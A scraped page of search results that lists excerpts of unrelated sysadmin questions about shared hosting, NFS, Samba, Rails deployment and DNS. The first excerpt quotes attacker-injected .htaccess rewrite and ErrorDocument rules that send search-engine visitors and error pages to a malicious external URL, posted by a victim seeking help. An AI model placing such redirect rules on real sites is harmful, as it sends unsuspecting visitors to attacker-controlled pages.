Search Results

Search found 7554 results on 303 pages for 'shared secret'.

Page 21/303 | < Previous Page | 17 18 19 20 21 22 23 24 25 26 27 28  | Next Page >

  • shared hosting with malware, .htaccess file gets modified every 2 hours or so

    - by apache
    I spent all day today chasing malware on the shared hosting for one of my clients. The issue is as follows: Every 2 hours or so .htaccess file and all other .htaccess files gets modified, on the top of the file these lines are added: IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*) RewriteRule ^(.*)$ http://pasla-ghwoo.ru/rqpgfap?8 [R=301,L] </IfModule> and on the bottom: ErrorDocument 400 http://pasla-ghwoo.ru/rqpgfap?8 ErrorDocument 401 http://pasla-ghwoo.ru/rqpgfap?8 ErrorDocument 403 http://pasla-ghwoo.ru/rqpgfap?8 ErrorDocument 404 http://pasla-ghwoo.ru/rqpgfap?8 ErrorDocument 500 http://pasla-ghwoo.ru/rqpgfap?8 The main problem I'm not root on the server, and cannot sudo, as this is shared hosting with 100's of websites. Typical good commands like dmesg, lsof, dtrace, chattr and many others are not available to me as I'm not root. I can't find who is modifying .htaccess files, how do I get that info? My guess is some php script is changing that which is called from outside via command and control. This seems to relate to this: http://blog.unmaskparasites.com/2009/09/11/dynamic-dns-and-botnet-of-zombie-web-servers/ How do I find out who is modifying .htaccess files without being root?

    Read the article

  • NFS-shared file-system is locking up

    - by fredden
    Our NFS-shared file-system is locking up. Please feel free to ask any questions you feel relevant. :) At the time, there are a lot of processes in "disk sleep" state, and the load averages on our machines sky-rocket. The machines are responsive on SSH, but our the majority of our websites (apache+mod_php) just hang, as does our email system (exim+dovecot). Any websites which don't require write access to the file-system continue to operate. The load averages continue to rise until some kind of time-out is reached, but for at least 10-15 minutes. I've seen load averages over 800, yet the machines are still responsive for actions which don't require writing to the shared file-system. I've been investigating a variety of options, which have all turned out to be red-herrings: nagios, proftpd, bind, cron tasks. I'm seeing these messages in the file server's system log: Jul 30 09:37:17 fs0 kernel: [1810036.560046] statd: server localhost not responding, timed out Jul 30 09:37:17 fs0 kernel: [1810036.560053] nsm_mon_unmon: rpc failed, status=-5 Jul 30 09:37:17 fs0 kernel: [1810036.560064] lockd: cannot monitor node2 Jul 30 09:38:22 fs0 kernel: [1810101.384027] statd: server localhost not responding, timed out Jul 30 09:38:22 fs0 kernel: [1810101.384033] nsm_mon_unmon: rpc failed, status=-5 Jul 30 09:38:22 fs0 kernel: [1810101.384044] lockd: cannot monitor node0 Software involved: VMWare, Debian lenny (64bit), ancient Red Hat (32 bit) (version 7 I believe), Debian etch (32bit) NFS, apache2+mod_php, exim, dovecot, bind, amanda, proftpd, nagios, cacti, drbd, heartbeat, keepalived, LVS, cron, ssmtp, NIS, svn, puppet, memcache, mysql, postgres Joomla!, Magento, Typo3, Midgard, Symfony, custom php apps

    Read the article

  • Restoring a fresh home folder in a shared user domain environment

    - by Cocoabean
    I am using a tool called pGINA that adds another credential provider to my Windows 7 clients so we can authenticate campus users via campus LDAP. We have the default Windows credential providers setup to authenticate off of our Active Directory, but we have students in our classes that don't have entries in our AD, and we need to know who they are to allow them internet access. Once these LDAP users login using pGINA, they are all redirected to the same AD account, a 'kiosk' account with GPOs in place to prevent anything malicious. My concern is that my users will accidentally save personal login information or files in that shared profile, and another user may login later and have access to a previous user's Gmail account, as the AppData folder on each computer is shared by anyone logging into the kiosk user. I've looked into MS's 'roll-your-own' SteadyState but it didn't seem to have what I wanted. I tried to write a PS script to copy a pre-saved clean version of the profile from a network share, but I just kept running into issues with CredSSP delegation and accessing the share from the UNC path. Others have recommended something like DeepFreeze but I'd like to do it without 3rd party tools if possible.

    Read the article

  • UNC shared path not accessible though necessary permissions are set

    - by Vysakh
    I have 2 environments A and B. A is an original environment whereas B is a clone of A, exactly except AD servers. AD server of B has been assigned a trust relationship with A, so that all the service and user accounts of A can be used in B too. And trusting works fine, perfect!! But I encounter some issues accessing UNC paths(\server2\shared) with these service accounts. I had a check in A environment and all the permissions set in that environment is done in B too (already set since it is a clone of A),but the issue is with B environment only. And FYI, the user is an owner of that folder in both the environments. I tried creating a folder inside the share(\server2\shared) using command prompt, but failed with error "access denied". What I done a workaround is that I added that user in "security" tab of folder permissions and after that it worked fine. But this was not done in the original environment. Is this something related to trust relationship? Why the share to the same location for the same user works differently in 2 environments, though they've been set with the same permissions. FYI, these are windows 2003 servers. Can someone please help.

    Read the article

  • why adding router will hide all share folders

    - by user1285419
    I have several computers running winxp installed in my office, they are all connecting to the WAN providing by the building (wall socket) (DHCP, mask 255.255.252.0). I setup a shared folder in my computer so all other computer in the same group could access it. This configuration have been using for long time. Recently, I am trying to setup a router. I have the WAN port of the router go to the wall socket, connect the NIC to the LAN port of the router, setup the router in DHCP mode (192.168.0.100/255.255.255.0 to 192.168.0.110 /255.255.255.0), I turn off all the firewall (windows one and router's builtin one), the NIC has ip set as DHCP. If I ipconfig/all, I see that the NIC was assigned ip 192.168.0.100. I can access the internal, email whatever. However, the shared folder can no longer be accessed by other computers in the same group. I think it is the problem of ip. But what's really weird is if I turn off the DHCP function in the router, ipconfig/all always give 0.0.0.0/255.255.255.255 and I cannot access the internet. I have no idea what's going on. Anyone know how to fix it and allow the shared folder in application of router? Thanks.

    Read the article

  • Ruby (Rack) application could not be started - Passenger (3.0.9) error for rails 3.1.0 app on ubuntu and nginx (1.0.6) after deploying

    - by user938363
    Here is the error saying bcrypt was not loaded. The rails app is not using the Devise for authentication and gem bcrypt is not in Gemfile. Sometime, the webserver throws out the error saying spawn server can not start. gem list shows that both bcrypt-ruby 3.0.1 and 3.0.0 were installed. Ruby (Rack) application could not be started A source file that the application requires, is missing. * It is possible that you didn't upload your application files correctly. Please check whether all your application files are uploaded. * A required library may not installed. Please install all libraries that this application requires. Further information about the error may have been written to the application's log file. Please check it in order to analyse the problem. Error message: no such file to load -- bcrypt Exception class: LoadError Application root: /vol/www/emclab/current Backtrace: # File Line Location 0 /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/activesupport-3.1.0/lib/active_support/dependencies.rb 240 in `require' 1 /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/activesupport-3.1.0/lib/active_support/dependencies.rb 240 in `block in require' 2 /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/activesupport-3.1.0/lib/active_support/dependencies.rb 225 in `load_dependency' 3 /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/activesupport-3.1.0/lib/active_support/dependencies.rb 240 in `require' 4 /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/activemodel-3.1.0/lib/active_model/secure_password.rb 1 in `' 5 /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/activerecord-3.1.0/lib/active_record/base.rb 2160 in `block in ' 6 /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/activerecord-3.1.0/lib/active_record/base.rb 2140 in `class_eval' 7 /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/activerecord-3.1.0/lib/active_record/base.rb 2140 in `' 8 /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/activerecord-3.1.0/lib/active_record/base.rb 31 in `' 9 /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/activerecord-3.1.0/lib/active_record/session_store.rb 77 in `' 10 /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/activerecord-3.1.0/lib/active_record/session_store.rb 51 in `' 11 /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/activerecord-3.1.0/lib/active_record/session_store.rb 1 in `' 12 /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/railties-3.1.0/lib/rails/application/configuration.rb 123 in `session_store' 13 /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/railties-3.1.0/lib/rails/application.rb 168 in `block in default_middleware_stack' 14 /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/railties-3.1.0/lib/rails/application.rb 142 in `tap' 15 /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/railties-3.1.0/lib/rails/application.rb 142 in `default_middleware_stack' 16 /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/railties-3.1.0/lib/rails/engine.rb 445 in `app' 17 /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/railties-3.1.0/lib/rails/application/finisher.rb 37 in `block in ' 18 /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/railties-3.1.0/lib/rails/initializable.rb 25 in `instance_exec' 19 /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/railties-3.1.0/lib/rails/initializable.rb 25 in `run' 20 /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/railties-3.1.0/lib/rails/initializable.rb 50 in `block in run_initializers' 21 /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/railties-3.1.0/lib/rails/initializable.rb 49 in `each' 22 /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/railties-3.1.0/lib/rails/initializable.rb 49 in `run_initializers' 23 /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/railties-3.1.0/lib/rails/application.rb 92 in `initialize!' 24 /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/railties-3.1.0/lib/rails/railtie/configurable.rb 30 in `method_missing' 25 /vol/www/emclab/releases/20111115184804/config/environment.rb 5 in `' 26 config.ru 3 in `require' 27 config.ru 3 in `block in ' 28 /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/rack-1.3.2/lib/rack/builder.rb 51 in `instance_eval' 29 /vol/www/emclab/shared/bundle/ruby/1.9.1/gems/rack-1.3.2/lib/rack/builder.rb 51 in `initialize' 30 config.ru 1 in `new' 31 config.ru 1 in `' 32 /home/dtt/.rvm/gems/ruby-1.9.2-p290/gems/passenger-3.0.9/lib/phusion_passenger/rack/application_spawner.rb 222 in `eval' 33 /home/dtt/.rvm/gems/ruby-1.9.2-p290/gems/passenger-3.0.9/lib/phusion_passenger/rack/application_spawner.rb 222 in `load_rack_app' 34 /home/dtt/.rvm/gems/ruby-1.9.2-p290/gems/passenger-3.0.9/lib/phusion_passenger/rack/application_spawner.rb 156 in `block in initialize_server' 35 /home/dtt/.rvm/gems/ruby-1.9.2-p290/gems/passenger-3.0.9/lib/phusion_passenger/utils.rb 572 in `report_app_init_status' 36 /home/dtt/.rvm/gems/ruby-1.9.2-p290/gems/passenger-3.0.9/lib/phusion_passenger/rack/application_spawner.rb 153 in `initialize_server' 37 /home/dtt/.rvm/gems/ruby-1.9.2-p290/gems/passenger-3.0.9/lib/phusion_passenger/abstract_server.rb 204 in `start_synchronously' 38 /home/dtt/.rvm/gems/ruby-1.9.2-p290/gems/passenger-3.0.9/lib/phusion_passenger/abstract_server.rb 180 in `start' 39 /home/dtt/.rvm/gems/ruby-1.9.2-p290/gems/passenger-3.0.9/lib/phusion_passenger/rack/application_spawner.rb 128 in `start' 40 /home/dtt/.rvm/gems/ruby-1.9.2-p290/gems/passenger-3.0.9/lib/phusion_passenger/spawn_manager.rb 253 in `block (2 levels) in spawn_rack_application' 41 /home/dtt/.rvm/gems/ruby-1.9.2-p290/gems/passenger-3.0.9/lib/phusion_passenger/abstract_server_collection.rb 132 in `lookup_or_add' 42 /home/dtt/.rvm/gems/ruby-1.9.2-p290/gems/passenger-3.0.9/lib/phusion_passenger/spawn_manager.rb 246 in `block in spawn_rack_application' 43 /home/dtt/.rvm/gems/ruby-1.9.2-p290/gems/passenger-3.0.9/lib/phusion_passenger/abstract_server_collection.rb 82 in `block in synchronize' 44 prelude> 10:in `synchronize' 45 /home/dtt/.rvm/gems/ruby-1.9.2-p290/gems/passenger-3.0.9/lib/phusion_passenger/abstract_server_collection.rb 79 in `synchronize' 46 /home/dtt/.rvm/gems/ruby-1.9.2-p290/gems/passenger-3.0.9/lib/phusion_passenger/spawn_manager.rb 244 in `spawn_rack_application' 47 /home/dtt/.rvm/gems/ruby-1.9.2-p290/gems/passenger-3.0.9/lib/phusion_passenger/spawn_manager.rb 137 in `spawn_application' 48 /home/dtt/.rvm/gems/ruby-1.9.2-p290/gems/passenger-3.0.9/lib/phusion_passenger/spawn_manager.rb 275 in `handle_spawn_application' 49 /home/dtt/.rvm/gems/ruby-1.9.2-p290/gems/passenger-3.0.9/lib/phusion_passenger/abstract_server.rb 357 in `server_main_loop' 50 /home/dtt/.rvm/gems/ruby-1.9.2-p290/gems/passenger-3.0.9/lib/phusion_passenger/abstract_server.rb 206 in `start_synchronously' 51 /home/dtt/.rvm/gems/ruby-1.9.2-p290/gems/passenger-3.0.9/helper-scripts/passenger-spawn-server 99 in `' cap deploy:check returns: You appear to have all necessary dependencies installed Any thoughts about the problem? thanks!

    Read the article

  • HostGator hosting account and DNS servers

    - by fxuser
    I have a hosting package on HostGator on domain example.com I also got a VPS server from Digital Ocean and have setup the DNS Details on the server there (A Record pointing on DO server IP with @ as hostname) and have also setup the DNS Servers on my domain DNS Settings which is hosted on HostGator. All seem okay right now... It's been 3-4 hours I think till I made these changes and when I point to example.com I still get on the active hosting package files instead of the server files. Do I need to cancel the hosting package first before I can make this work? EDIT: If I'm in the wrong site please move it to the correct one.

    Read the article

  • Samba smb.conf read only and read/write accounts

    - by Pieter
    Below you can see my smb.conf, pieter is my admin user read/write on the shares works good with that account. Then I have a leecher account that has been added with smbpasswd -a leecher to the smb users, it is set up so this user only has read access to the shares. This works on MegaSam and on Thumbnails but not on my other drives, leecher does not get any access on the other shares. [global] security = user [MegaSam] comment = MegaSam path = /media/MegaSam browsable = yes guest ok = no read list = leecher write list = pieter create mask = 0755 [SilentBob] comment = SilentBob path = /media/SilentBob browsable = yes guest ok = no read list = leecher write list = pieter create mask = 0755 [Thumbnails] comment = Thumbnails path = /media/Thumbnails browsable = yes guest ok = no read list = leecher write list = pieter create mask = 0755 [Downloads] comment = Downloads path = /media/Downloads browsable = yes guest ok = no read list = leecher write list = pieter create mask = 0755

    Read the article

  • Why do I need lib64 on my 32 bit machine?

    - by Tim
    I am trying to install Oracle on my 32-bit machine that runs Ubuntu 10.4. I am following install Oracle on Ubuntu tutorial. At the very first step there is a requirement to manually install library libstdc++5. Author does 2 steps: download libstdc++5_3.3.6-17ubuntu1_amd64.deb from here download ia32-libs_2.7ubuntu6.1_amd64.deb from here As you may have probably noticed these 2 files contain an "_amd64" postfix, which pointed me out that author is using 64-bit amd processor. Each of these files author copied to /usr/lib64 and /usr/lib32 folders correspondingly and simply make soft links libstdc++.so.5 in both folders. Since I am running 32-bit machine I have simply downloaded those 2 files without "_amd64" postfix. Unexpectedly for me I have also found 2 lib folders in my /usr folder: /usr/lib64 and /usr/lib. So here is my problem: I do not understand which files and where do I have to copy: 1) Do I have to make the same steps as the author has done, i.e. download files with "_amd64" postfixes and place them in my /usr/lib64 and /usr/lib folders? 2) Or do I have to use libraries without "_amd64" postfix? And one more question: why do I have /usr/lib64 at all?

    Read the article

  • 1and1: Unable to host an external domain

    - by Django Reinhardt
    I'm sorry if this isn't the right place for this question, but I'm presently having difficulties with my hosting provider (1and1). Two weeks ago, two of my clients bought hosting from them on my recommendation, but as it turned out, 1and1 are having severe technical difficulties. Right now non of their hosting packages are able to accept ANY external domains. So either you pay the costs of transferring the registrar of your domain, or you use the ugly 1and1 domain name. Not any good for a hosting company of 1and1's reputation! They have been promising me for two weeks that they're going to fix the problem, but as you have probably guessed by now, that hasn't been the case. I would like to know if a) Anyone else is in the same boat as me, and b) If there are other comparably reputable hosting providers that I should consider moving to instead? Very disappointing! :( Note: This is for 1and1 in the UK. I imagine it isn't affecting users in other countries(?) Clarification: 1and1 are unable to accept ANY external domains. That means that even if you update your DNS details on your domain, their system cannot be updated to add your external domain to your account.

    Read the article

  • Are libc versions tied to kernel versions?

    - by mathematician1975
    After reading the answers to my previous question I have come to the conclusion that an answer to the following question is what I was actually looking for: Does a particular version of the kernel require a particular version of libc to run properly? Basically my problem stems from building an application on my 12.04 ubuntu and trying to run it on 8.04. I have since learned from this and other stackexchange forums that it is backward compatibility of libc that causes these problems. Therefore what I am perhaps naively trying to do is build the same version of libc that exists on my target and then link against that on my host when I build the application. Then in an ideal world when I copy this to the host, having been linked to the "correct" libc it should work (in my head at least). I have been totally unable to find a way to install an older libc on my system, and wondered if each version is tightly bound to a kernel version, hence the above question.

    Read the article

  • Nautilus bookmarks and smb shares work with non-root user

    - by Enrique
    I'm having a problem with Nautilus in Ubuntu 10.10 When I open Nautilus as common user, it shows bookmarks and the bookmarks that point to smb windows shares work fine. However, if I start Nautilus as root, it does not show bookmarks, and if I try to browse a smb share directly (by pressing Ctrl+L and inserting an address like smb://[email protected]/backups/) it doesn't work and gives me an error that it couldn't be found.

    Read the article

  • How do I encrypt but share a number of folders?

    - by d3vid
    I want to achieve the following functionality. Is it possible? Boot up computer (possibly via WakeOnLan or WakeOnPlan). Either be automatically logged in, or log in via login screen, or log in remotely. I change this behavior occasionally, so full disk encryption wouldn't work for me because it requires a password on bootup (which would it would prevent the remote bootup options, and the automatic login option). I am only interested in encrypting data, not the entire harddrive. Once logged in either: a launcher/tray icon is available to launch encryption app (preferred) run encryption app from the dash Prompted to unlock encrypted folder(s) individually. Unlocked folders are available to: me, apps I am running (e.g. editors, SpiderOak) Ideally, folders that I share with bindfs can be locked/unlocked by other users too. A key point is that once I have unlocked an encrypted folder, I don't want to have to think about it again. I currently achieve this via TrueCrypt (except for the last part). Unfortunately TrueCrypt isn't well integrated with Ubuntu (licensing issues prevent Debian from including it in their repo, the interface isn't quite integrated with Unity, setting it as a startup app doesn't quite work, sharing encrypted folders isn't really part of its design). Is there an alternative to TrueCrypt that is better integrated with the Ubuntu GUI and would suit this workflow?

    Read the article

  • Ubuntu boots up maintenance shell?

    - by Andrew
    Any time I try to start up my computer it goes to a screen titled GNU GRUB version 1.99-12ubuntu5 I can then choose from 5 different options. If I try to just boot Ubuntu, with Linux 3.0.0-20-generic it then goes to a screen saying: mountall: /lib/x86_64-linux-gnu/libc.so.6: version 'GLIBC_2.14' not found (required by /lib/libply.so.2) General error mounting filesystems. A maintenance shell will now be started. CONTROL-D will terminate this shell and reboot the system. root@Brown126:~# Control-D just brings me back to the first screen. And nothing works in recovery mode. How can I fix this?

    Read the article

  • please help me understand libraries/includes

    - by fiftyeight
    I'm trying to understand how libraries work. for example I downloaded a tarball and extracted it. Now I do "./configure", it searches in pre-defined directories from what I understand for certain library files. What does it do then? it creates a makefile, and the makefile contains the paths to these libraries? than I do "make", it complies the source code and hard-codes the locations of the libraries? am I correct? I do not really understand if libraries are files with pre-defined paths or the OS somehow gives access to the libraries through system calls. another example, I complied something on my computer than moved it to a remote server, the executable needs mysql libraries to work, the server has mysql but for some reason when execute the file it tells me "can't find libmysqlclient.so.16". is there a solution for this? is there a way to know where is tries to locate this file or give it another path? I can't compile it on the server since it has no compiler and I don't have root access to install packages last question is if in the sequence "./configure","make","make install" the "make install" command is the only one that actually puts files outside the directory in which these files reside? if for example the software will be installed in /usr/local/ is the "make install" command the only one that will require "sudo" before it? let me see if I got it correctly: "./configure" creates the Makefile according to the location of various files on your system. "make" compiles the source code according to this makefile. and "make install" moves the files to their appropriate location. I know this has been very long I thank anyone who had the patience to read my question :)

    Read the article

  • Hosting several HTTP servers on single domain name

    - by Nakilon
    Several people have got a single domain name server.company.com server, where they are now supposed to host their infrastructure or temporal projects, written in different ways even in different programming languages. How do they divide the domain? Split into subdomains: john.server.company.com, kate.server.company.com, etc. This would need a lot of admins' assistance, time, etc. -- there would be no way for John and Kate to do it themselves. Split into url namespaces: server.company.com/john/, server.company.com/kate/, etc. Pro: They now can make a single welcome page at root with any additional info (if they need?) Con: Each server would need to know their namespace string constant, and hrefs like / whould need patching. Split into ports: server.company.com:8080, server.company.com:8081, etc. and make a single :80 welcome page. Pro: They still can make a single welcome page at :80 Con: ??? I would like to know more pros and cons for 2 and 3 solution.

    Read the article

  • "Unable to mount location. Failed to mount Windows share" error when trying to share folders

    - by paulus_almighty
    I have two Ubuntu machines both on 11.10 I want to share folders from one to the other. If, on the server machine, (in Nautilus) I right click on the folders and click Properties Share Share this folder Create share. Then on the client I'm prompted for a username and password. My username and password does not work. If I select "Guest access" check box then I get "Unable to mount location. Failed to mount Windows share" This should be straightforward, right?

    Read the article

  • Port forward based on external IP (for VPS hosting)

    - by Ben Alter
    What I want to do is to host a VPS. First, I'd like to set up a static IP address that forwards to my home IP address (so I can have more than one IP coming into my house). How can I do this without contacting my ISP (and is it even possible?; I don't care about paying for something that does this). Once I have the extra external IP address, how can I forward it to my VPS? How is my router supposed to differentiate between two separate external IP addresses?

    Read the article

  • Find version of development library from command line?

    - by mathematician1975
    I installed the c++ boost development libraries using Ubuntu software centre. The problem is that it was quite a long time ago and I cannot remember where they are installed nor what version they were. Is there anything I can do from the command line that will tell me what version(s) I have installed on my system?? I know I can do things like gcc -v to get version of an application but is there a similar thing available for libraries? I am using ubuntu 12.04

    Read the article

  • How can I install an old version of libc on 12.04 and is it safe to do so?

    - by mathematician1975
    I am building an application on 12.04 and I need to run it on an embedded device. The device has libc-2.8.90.so on it and my dev machine has libc-2.15.so on it. I would like to install libc-2.8.90 onto my dev machine and attempt to link it to my application. I have searched at the Ubuntu software centre for libc-2.8.90 but I cannot find anything resembling it. Is there a way to install this on my machine from command line?? Also will my system be safe having 2 installed versions of libc at the same time? Can it lead to any instability?

    Read the article

  • phishing attack. Where do I start the cleanup?

    - by Suz
    I'm a newbie webmaster. I've got a domain and a site... and no clue about the web (I'm OK with files and programs... ) I got a message from google that my site is a possible phishing site, with a link the the suspect page: http://www.mydomain.com/~phishers/Paypal/us/Confirm.php needless to say, I didn't put that up. Can someone point me to a good tutorial on what to do now? I'd like to figure out what happened so I can defend against it the next time around. How do I identify what kind of attach this is? Also, what is the tilde doing in the URL path? I couldn't find any path like this on my hosting account, so I'm not entirely sure how to delete it.

    Read the article

  • My cPanel login is being redirected. How can I resolve this?

    - by Suz
    I'm trying to get to cPanel to manage my website. When I type www.mydomain.com:2082 into the browser window, the request seems to be redirected. I made a screen-cast so I could slow down the changes in the address bar. First it seems to go to http://www.mydomain.com:2082/login then http://www.mydomain.com/cgi-sys/login.cgi At this point, a screen briefly appears which says 'Login attempt failed' and then the address is redirected to https://this22.thishost.com:2083/, which is no relation to my site at all. This looks to me like there has been an attack on the system and the login.cgi file is compromised. Any suggestions on how to analyze this further? or fix it? Of course my 'free hosting' isn't any help at all.

    Read the article

  • Samba login before requesting list of shares?

    - by user69359
    I'm relatively inexperienced at this and am starting to get a little frustrated: I have a Ubuntu Server with several user accounts. The Samba file server hosts a number of public shares + the home directories of each user as a private share. When connecting to the server using my OSX machine, I am prompted to enter my login data, and get a overview of all the public shares + my accounts home directory share. Exactly the way I want it. How ever, when I connect to the server from a Ubuntu machine, I am never prompted to enter any login data, and can only see the public folders. If a user wants to connect to their home directory on the server, they have to go through "connect to server" and mount their specific private share. Is there anyway to configure Samba or the Ubuntu client in a way that will make the user experience more similar to how it is on my OSX box? Thank you for your time!

    Read the article

  • Rails 3 - yield return or callback won't call in view <%= yield(:sidebar) || render('shared/sidebar'

    - by rzar
    Hey folks, I'm migrating a Website from Rails 2 (latest) to Rails 3 (beta2). Testing with Ruby 1.9.1p378 and Ruby 1.9.2dev (2010-04-05 trunk 27225) Stuck in a situation, i don't know which part will work well. Suspect yield is the problem, but don't know exactly. In my Layout Files I use the following technique quite often: app/views/layouts/application.html.erb: <%= yield(:sidebar) || render('shared/sidebar') %> For Example the partial look like: app/views/shared/_sidebar.html.erb: <p>Default sidebar Content. Bla Bla</p> Now it is time for the key part! In any view, I want to create a content_for block (optional). This can contain a pice of HTML etc. example below. If this block is set, the pice HTML inside should render in application.html.erb. If not, Rails should render the Partial at shared/_sidebar.html.erb on the right hand side. app/views/books/index.html.erb: <% content_for :sidebar do %> <strong>You have to read REWORK, a book from 37signals!</strong> <% end %> So you've got the idea. Hopefully. This technique worked well in any Rails 2.x Application. Now, in Rails 3 (beta2) only the yield Part is working. || render('shared/sidebar') The or side will not process by rails or maybe ruby. Thanks for input and time!

    Read the article

< Previous Page | 17 18 19 20 21 22 23 24 25 26 27 28  | Next Page >